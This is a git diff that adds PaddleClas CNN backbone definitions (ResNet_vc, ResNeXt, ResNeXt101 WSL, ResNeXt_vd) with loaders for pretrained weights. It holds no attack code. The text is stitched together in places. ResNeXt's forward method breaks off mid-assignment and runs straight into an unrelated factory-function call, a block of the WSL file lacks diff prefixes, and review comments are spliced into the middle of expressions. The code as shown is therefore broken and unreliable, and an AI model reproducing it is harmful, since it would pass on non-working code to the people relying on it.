+ for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + 
+        # NOTE(review): fc init uses stdv = 1/sqrt(pooled channels); parameter names "fc_0.w_0"/"fc_0.b_0" presumably match the legacy static-graph pretrained checkpoint layout — confirm before renaming.
weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_0.w_0"), + bias_attr=ParamAttr(name="fc_0.b_0")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNet50_vc(pretrained=False, use_ssld=False, **kwargs): + model = ResNet_vc(layers=50, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNet50_vc"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py new file mode 100644 index 0000000..1aef811 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py @@ -0,0 +1,298 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# NOTE(review): resnext.py — ResNeXt backbone: bottleneck 3x3 conv is grouped by `cardinality` (32 or 64); supports NCHW/NHWC via `data_format` and wraps forward in paddle.static.amp.fp16_guard().
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt50_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_32x4d_pretrained.pdparams", + "ResNeXt50_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_64x4d_pretrained.pdparams", + "ResNeXt101_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x4d_pretrained.pdparams", + "ResNeXt101_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_64x4d_pretrained.pdparams", + "ResNeXt152_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_32x4d_pretrained.pdparams", + "ResNeXt152_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_64x4d_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None, + data_format="NCHW"): + super(ConvBNLayer, self).__init__() + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False, + data_format=data_format) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + 
'_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance', + data_layout=data_format) + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + shortcut=True, + name=None, + data_format="NCHW"): + super(BottleneckBlock, self).__init__() + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a", + data_format=data_format) + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name=name + "_branch2b", + data_format=data_format) + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name=name + "_branch2c", + data_format=data_format) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1", + data_format=data_format) + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class ResNeXt(nn.Layer): + def __init__(self, + layers=50, + class_num=1000, + cardinality=32, + input_image_channel=3, + data_format="NCHW"): + super(ResNeXt, self).__init__() + + self.layers = layers + self.data_format = data_format + self.input_image_channel = input_image_channel + self.cardinality = cardinality + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, 
+        # NOTE(review): branch widths depend on cardinality — num_filters doubles through conv2 only for cardinality==32 (see BottleneckBlock), so stage output channels end up equal for both 32x4d and 64x4d configs.
layers) + supported_cardinality = [32, 64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + + self.conv = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=7, + stride=2, + act='relu', + name="res_conv1", + data_format=self.data_format) + self.pool2d_max = MaxPool2D( + kernel_size=3, stride=2, padding=1, data_format=self.data_format) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + shortcut=shortcut, + name=conv_name, + data_format=self.data_format)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1, data_format=self.data_format) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + with paddle.static.amp.fp16_guard(): + if self.data_format == "NHWC": + inputs = 
pretrained, model, MODEL_URLS["ResNeXt152_64x4d"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py new file mode 100644 index 0000000..e85e133 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py @@ -0,0 +1,490 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt101_32x8d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x8d_wsl_pretrained.pdparams", + "ResNeXt101_32x16d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x16_wsl_pretrained.pdparams", + "ResNeXt101_32x32d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x32d_wsl_pretrained.pdparams", + "ResNeXt101_32x48d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x48d_wsl_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + if "downsample" in name: + conv_name = name + ".0" + else: + conv_name = name + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=conv_name + ".weight"), + bias_attr=False) + if "downsample" in name: + bn_name = name[:9] + "downsample.1" + else: + if "conv1" == name: + bn_name = "bn" + name[-1] + 
else: + bn_name = (name[:10] if name[7:9].isdigit() else name[:9] + ) + "bn" + name[-1] + self._bn = BatchNorm( + num_channels=output_channels, + act=act, + param_attr=ParamAttr(name=bn_name + ".weight"), + bias_attr=ParamAttr(name=bn_name + ".bias"), + moving_mean_name=bn_name + ".running_mean", + moving_variance_name=bn_name + ".running_var") + + def forward(self, inputs): + x = self._conv(inputs) + x = self._bn(x) + return x + + +class ShortCut(nn.Layer): + def __init__(self, input_channels, output_channels, stride, name=None): + super(ShortCut, self).__init__() + + self.input_channels = input_channels + self.output_channels = output_channels + self.stride = stride + if input_channels != output_channels or stride != 1: + self._conv = ConvBNLayer( + input_channels, + output_channels, + filter_size=1, + stride=stride, + name=name) + + def forward(self, inputs): + if self.input_channels != self.output_channels or self.stride != 1: + return self._conv(inputs) + return inputs + + +class BottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels, stride, cardinality, + width, name): + super(BottleneckBlock, self).__init__() + + self._conv0 = ConvBNLayer( + input_channels, + output_channels, + filter_size=1, + act="relu", + name=name + ".conv1") + self._conv1 = ConvBNLayer( + output_channels, + output_channels, + filter_size=3, + act="relu", + stride=stride, + groups=cardinality, + name=name + ".conv2") + self._conv2 = ConvBNLayer( + output_channels, + output_channels // (width // 8), + filter_size=1, + act=None, + name=name + ".conv3") + self._short = ShortCut( + input_channels, + output_channels // (width // 8), + stride=stride, + name=name + ".downsample") + + def forward(self, inputs): + x = self._conv0(inputs) + x = self._conv1(x) + x = self._conv2(x) + y = self._short(inputs) + y = paddle.add(x, y) + y = F.relu(y) + return y + + +class ResNeXt101WSL(nn.Layer): + def __init__(self, layers=101, cardinality=32, width=48, class_num=1000): + 
super(ResNeXt101WSL, self).__init__() + + self.class_num = class_num + + self.layers = layers + self.cardinality = cardinality + self.width = width + self.scale = width // 8 + + self.depth = [3, 4, 23, 3] + self.base_width = cardinality * width + num_filters = [self.base_width * i + for i in [1, 2, 4, 8]] # [256, 512, 1024, 2048] + self._conv_stem = ConvBNLayer( + 3, 64, 7, stride=2, act="relu", name="conv1") + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self._conv1_0 = BottleneckBlock( + 64, + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.0") + self._conv1_1 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.1") + self._conv1_2 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.2") + + self._conv2_0 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[1], + stride=2, + cardinality=self.cardinality, + width=self.width, + name="layer2.0") + self._conv2_1 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.1") + self._conv2_2 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.2") + self._conv2_3 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.3") + + self._conv3_0 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[2], + stride=2, + cardinality=self.cardinality, + width=self.width, + name="layer3.0") + self._conv3_1 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.1") + self._conv3_2 = 
BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.2") + self._conv3_3 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.3") + self._conv3_4 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.4") + self._conv3_5 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.5") + self._conv3_6 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.6") + self._conv3_7 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.7") + self._conv3_8 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.8") + self._conv3_9 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.9") + self._conv3_10 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.10") + self._conv3_11 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.11") + self._conv3_12 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.12") + self._conv3_13 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + 
width=self.width, + name="layer3.13") + self._conv3_14 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.14") + self._conv3_15 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.15") + self._conv3_16 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.16") + self._conv3_17 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.17") + self._conv3_18 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.18") + self._conv3_19 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.19") + self._conv3_20 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.20") + self._conv3_21 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.21") + self._conv3_22 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.22") + + self._conv4_0 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[3], + stride=2, + cardinality=self.cardinality, + width=self.width, + name="layer4.0") + self._conv4_1 = BottleneckBlock( + num_filters[3] // (width // 8), + num_filters[3], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer4.1") + self._conv4_2 = BottleneckBlock( + num_filters[3] // (width // 8), + 
num_filters[3], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer4.2") + + self._avg_pool = AdaptiveAvgPool2D(1) + self._out = Linear( + num_filters[3] // (width // 8), + class_num, + weight_attr=ParamAttr(name="fc.weight"), + bias_attr=ParamAttr(name="fc.bias")) + + def forward(self, inputs): + x = self._conv_stem(inputs) + x = self._pool(x) + + x = self._conv1_0(x) + x = self._conv1_1(x) + x = self._conv1_2(x) + + x = self._conv2_0(x) + x = self._conv2_1(x) + x = self._conv2_2(x) + x = self._conv2_3(x) + + x = self._conv3_0(x) + x = self._conv3_1(x) + x = self._conv3_2(x) + x = self._conv3_3(x) + x = self._conv3_4(x) + x = self._conv3_5(x) + x = self._conv3_6(x) + x = self._conv3_7(x) + x = self._conv3_8(x) + x = self._conv3_9(x) + x = self._conv3_10(x) + x = self._conv3_11(x) + x = self._conv3_12(x) + x = self._conv3_13(x) + x = self._conv3_14(x) + x = self._conv3_15(x) + x = self._conv3_16(x) + x = self._conv3_17(x) + x = self._conv3_18(x) + x = self._conv3_19(x) + x = self._conv3_20(x) + x = self._conv3_21(x) + x = self._conv3_22(x) + + x = self._conv4_0(x) + x = self._conv4_1(x) + x = self._conv4_2(x) + + x = self._avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
def _build_wsl(arch, width, pretrained, use_ssld, **kwargs):
    # Shared constructor for the public WSL factory functions below.
    # All WSL variants use cardinality 32; only the bottleneck width differs.
    model = ResNeXt101WSL(cardinality=32, width=width, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS[arch], use_ssld=use_ssld)
    return model


def ResNeXt101_32x8d_wsl(pretrained=False, use_ssld=False, **kwargs):
    """ResNeXt101 32x8d pre-trained with weakly supervised learning (WSL)."""
    return _build_wsl("ResNeXt101_32x8d_wsl", 8, pretrained, use_ssld, **kwargs)


def ResNeXt101_32x16d_wsl(pretrained=False, use_ssld=False, **kwargs):
    """ResNeXt101 32x16d WSL variant."""
    return _build_wsl("ResNeXt101_32x16d_wsl", 16, pretrained, use_ssld,
                      **kwargs)


def ResNeXt101_32x32d_wsl(pretrained=False, use_ssld=False, **kwargs):
    """ResNeXt101 32x32d WSL variant."""
    return _build_wsl("ResNeXt101_32x32d_wsl", 32, pretrained, use_ssld,
                      **kwargs)


def ResNeXt101_32x48d_wsl(pretrained=False, use_ssld=False, **kwargs):
    """ResNeXt101 32x48d WSL variant."""
    return _build_wsl("ResNeXt101_32x48d_wsl", 48, pretrained, use_ssld,
                      **kwargs)
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt50_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_vd_32x4d_pretrained.pdparams", + "ResNeXt50_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_vd_64x4d_pretrained.pdparams", + "ResNeXt101_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_vd_32x4d_pretrained.pdparams", + "ResNeXt101_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_vd_64x4d_pretrained.pdparams", + "ResNeXt152_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_vd_32x4d_pretrained.pdparams", + "ResNeXt152_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_vd_64x4d_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + 
self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class ResNeXt(nn.Layer): + def __init__(self, layers=50, class_num=1000, cardinality=32): + super(ResNeXt, self).__init__() + + self.layers = layers + self.cardinality = cardinality + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + supported_cardinality = [32, 
64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): 
+ y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeXt50_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_vd_32x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt50_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_vd_64x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt101_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt101_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=64, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_vd_64x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt152_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt152_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt152_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + 
_load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt152_vd_64x4d"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py new file mode 100644 index 0000000..039f6c5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py @@ -0,0 +1,281 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
